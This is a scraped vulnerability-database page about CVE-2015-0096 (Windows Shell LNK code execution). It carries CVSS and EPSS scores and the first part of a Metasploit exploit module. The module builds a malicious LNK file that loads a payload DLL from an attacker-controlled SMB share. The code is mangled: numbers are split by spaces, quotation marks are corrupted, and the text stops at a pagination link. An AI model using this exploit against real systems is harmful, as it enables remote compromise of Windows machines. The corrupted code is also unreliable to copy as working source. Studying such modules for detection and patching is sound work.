Lucene search

K
myhack58佚名MYHACK58:62201560186
HistoryMar 21, 2015 - 12:00 a.m.

[CVE-2 0 1 5-0 0 9 6]Microsoft Windows Shell SMB LNK Code Execution Exploit-vulnerability warning-the black bar safety net

2015-03-2100:00:00
佚名
www.myhack58.com
78

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

require β€˜msf/core’

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::SMB::Server::Share

attr_accessor :exploit_dll_name

def initialize(info = {})
super(update_info(info,
β€˜Name’ => β€˜Microsoft Windows Shell LNK Code Execution’,
β€˜Description’ => %q{
This module exploits a vulnerability in the MS10-0 4 6 patch to abuse (again) the handling
of Windows Shortcut files (. LNK) that contain an icon resource pointing to a malicious
DLL. This creates an SMB resource is to provide the payload and the trigger, and generates a
LNK file which must be sent to the target. This module has been tested successfully on
Windows 2 0 0 3 SP2 with MS10-0 4 6 installed and Windows 2 0 0 8 SP2 (3 2 bits) with MS14-0 2 7
installed.
},
β€˜Author’ =>
[
β€˜Michael Heerklotz’, # Vulnerability discovery
β€˜juan vazquez’ # msf module
],
β€˜License’ => MSF_LICENSE,
β€˜References’ =>
[
[β€˜CVE’, β€˜2015-0096’],
[β€˜MSB’, β€˜MS15-0 2 0’],
[β€˜URL’, β€˜http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so’],
[β€˜URL’, β€˜https://github.com/rapid7/metasploit-framework/pull/4911’] # How to guide here
],
β€˜DefaultOptions’ =>
{
β€˜EXITFUNC’ => β€˜process’,
},
β€˜Payload’ =>
{
β€˜Space’ => 2 0 4 8,
},
β€˜Platform’ => β€˜win’,
β€˜Targets’ =>
[
[ β€˜Automatic’, { } ]
],
β€˜DisclosureDate’ => β€˜Mar 1 0 2 0 1 5’,
β€˜DefaultTarget’ => 0))

register_options(
[
OptString. new(β€˜FILENAME’, [true, β€˜The LNK file’, β€˜msf. lnk’])
], self.class)

register_advanced_options(
[
OptBool. new(β€˜DisablePayloadHandler’, [false, β€˜Disable the handler code for the selected payload’, false])
], self.class)

deregister_options(β€˜FILE_CONTENTS’, β€˜FILE_NAME’)
end

def smb_host
"\\\\#{srvhost}\\#{share}\"
end

def setup
super

self. file_contents = generate_payload_dll
random_char = rand_text_alpha(1)
self. file_name = β€œ#{random_char}. dll”
prefix = β€œ#{random_char}”
random_length = 2 5 7 - smb_host. length - file_name. length - prefix. length
self. exploit_dll_name = β€œ#{prefix}#{rand_text_alpha(random_length)}#{file_name}”

[1] [2] next

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%